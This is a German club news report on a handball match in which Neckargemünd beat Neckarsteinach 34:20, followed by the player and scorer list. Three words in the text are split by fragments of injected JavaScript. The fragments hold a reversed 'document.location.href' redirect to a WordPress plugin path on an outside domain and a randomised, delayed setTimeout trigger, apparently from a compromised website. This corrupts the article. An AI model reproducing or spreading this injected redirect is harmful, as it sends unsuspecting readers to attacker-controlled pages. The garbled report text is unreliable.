Am vergangenen Samstag war die neugegründete Neckarsteinacher Mannschaft zu Gast in der Münzenbachhalle. Nach zuletzt zwei Niederlagen wollte man wieder zurück auf die Überholspur.
Neckargemünd, 14.11.13 (bki) – In voller Besetzung wurde sich in den ersten Minuten lediglich vorsichtig abgetastet. Nach dem 1:1 rührten die Hausherren Betoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton in der Abwehr an und verwerteten die meisten Angriffe. Mit 9 Toren in Folge zog Neckargemünd auf 10:1 davon.
Mit einer komfortablen 16:9 Führung ging es in die Halbzeitpause.
Nach dem Seitenwechsel wurde der Vorsprung schnell auf 10 Tore ausgebaut. Die Partie war damit praktisch entschieden. Die Neckargemünder hatten auf alle Aktionen der Gäste die passende Antwort parat.
Auch als Neckarsteinachs Trainer versuchte mit 7 Feldspielern das Spiel zu drehen, wurde dieser Versuch zunichte gemacht, und zwar durch ein direktes Feldtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor von Torhüter Bastian Kirschmer.
Letztlich war man in allen Belangen überlegen und gewann klar mit 34:20.
Es spielten:
Im Tor: Michael Hechelhammer, Bastian Kirschmer (1)
Im Feld: Ulrich Weitzel (4/1), Frank Weitzel (3), Christoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toph Schmidt (3), Jochen Feßenbecker (4), Alexander Stephan (3/1), Simon Kronbichler, Niclas Heinze (6/1), Jann Thieme (4/1), Thorsten Hoffmann (1), Joachim Hermstedt (4), Milan Kraus (1)